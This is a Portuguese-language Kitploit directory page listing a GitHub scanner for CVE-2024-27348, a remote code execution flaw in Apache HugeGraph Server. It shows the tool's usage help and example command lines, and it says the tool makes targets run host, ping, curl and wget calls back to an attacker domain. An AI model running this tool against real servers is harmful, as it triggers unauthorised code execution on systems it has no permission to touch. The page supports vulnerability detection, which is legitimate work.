Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-27348 — Scanner de RCE do Apache HugeGraph Server ( CVE-2024-27348 ) | Kitploit
Ferramentas/GitHubGitHub/zeyad-azima/cve-2024-27348
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubzeyad-azima/cve-2024-27348

CVE-2024-27348

Scanner de RCE do Apache HugeGraph Server ( CVE-2024-27348 )

Ver Repositório
61142há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-27348

Apenas para usos éticos, quaisquer atividades nocivas ou maliciosas não são permitidas. E é de sua própria responsabilidade

  • Você pode ler a análise da vulnerabilidade aqui: https://blog.securelayer7.net/remote-code-execution-in-apache-hugegraph/

O Apache HugeGraph Server RCE Scanner (CVE-2024-27348) executará 4 comandos no alvo (host,ping,curl,wget), para o caso de um dos utilitários não ser encontrado.

HugeGraphRCE

Logs de ping dos alvos

Ping_Logs_Fromm_Targets

Consulta DNS, requisições web dos alvos

http_dns_requests_from_targets

Uso

root@kitploit:~
usage: [-h] [--file FILE] [--target TARGET] [--port PORT] [--domain DOMAIN]

Exploit CVE-2024-27348 Gremlin RCE in HugeGraph server from 1.0.0 Before 1.3.0

optional arguments:
  -h, --help            show this help message and exit
  --file FILE, -f FILE  File containing target addresses and ports W/ the following format: http://target,port e.x: http://localhost,8080
  --target TARGET, -t TARGET
                        Target IP address/domain
  --port PORT, -p PORT  Target port
  --domain DOMAIN, -d DOMAIN
                        Attacker domain (Your own domain to check ping/requests log)

Alvo Único

root@kitploit:~
python3 CVE-2024-27348_Scanner.py -t http(s)://target_address -p port -d your_domain/ip

Arquivo

root@kitploit:~
python3 CVE-2024-27348_Scanner.py -f targets_file -d your_domain/ip
  • Exemplo do formato de conteúdo do arquivo em targets.txt
Baixar ferramenta